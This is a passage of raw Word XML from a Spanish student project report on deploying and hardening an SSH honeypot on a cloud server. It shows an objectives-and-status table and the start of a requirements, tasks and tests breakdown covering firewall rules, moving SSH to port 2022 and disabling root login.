                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Un Ubuntu 24.04 recién creado queda operativo ejecutando tres scripts, sin pasos manuales adicionales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cumplido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE4. Capturar ataques reales durante un periodo suficiente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Al menos tres semanas de captura continua.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">En curso (desde el 4 de octubre)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE5. Desarrollar un analizador automático de los logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rankings, geolocalización, indicadores de compromiso y gráficas generados en una sola ejecución sobre más de 10 000 sesiones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cumplido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE6. Clasificar automáticamente la actividad en MITRE ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Al menos el 95 % de los comandos con técnica asignada y un conjunto de pruebas automáticas superado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cumplido con datos parciales (98,5 %; 50/50 pruebas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE7. Elaborar el informe de inteligencia de amenazas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Informe con campañas identificadas, indicadores de compromiso y recomendaciones vinculadas a mitigaciones de ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">En curso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OE8. Documentar el proyecto de forma reproducible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2150"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Memoria con el formato de Prometeo y repositorio público con scripts, configuración y capturas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">En curso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 4. Objetivos específicos, indicadores y estado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Desglose RFTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación se presenta el desglose completo del proyecto siguiendo la estructura RFTP (Requisitos, Funciones, Tareas, Pruebas) establecida por la plantilla de Prometeo FP. Cada requisito se descompone jerárquicamente con la codificación R &gt; F &gt; T &gt; P.</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111"/>
        <w:gridCol w:w="5239"/>
        <w:gridCol w:w="794"/>
        <w:gridCol w:w="794"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="700"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3300"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Despliegue de infraestructura cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R01F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Provisionar servidor en Hetzner Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R01F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Crear cuenta y proyecto en Hetzner Cloud con clave SSH dedicada</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R01F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Acceso a la consola con 2FA y clave SSH registrada</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R01F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Crear el Cloud Firewall (entrada solo TCP 22, TCP 2022 e ICMP)</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R01F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ping externo a la IP pública del servidor</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R01F01T03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Desplegar servidor CX23 (x86, Ubuntu 24.04, Núremberg)</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R01F01T03P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexión SSH al servidor desde terminal local</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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R01F02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Securizar el servidor (hardening)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R01F02T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurar firewall iptables persistente: abrir 2022, rechazar el resto</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R01F02T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap muestra solo puertos 22 y 2022 abiertos</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R01F02T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mover SSH real al puerto 2022 con clave ed25519</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R01F02T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexión SSH al puerto 2022 con clave, rechazo con contraseña</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R01F02T03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Deshabilitar login root y autenticación por contraseña</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R01F02T03P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Intento de login root rechazado</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shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instalación y configuración del honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
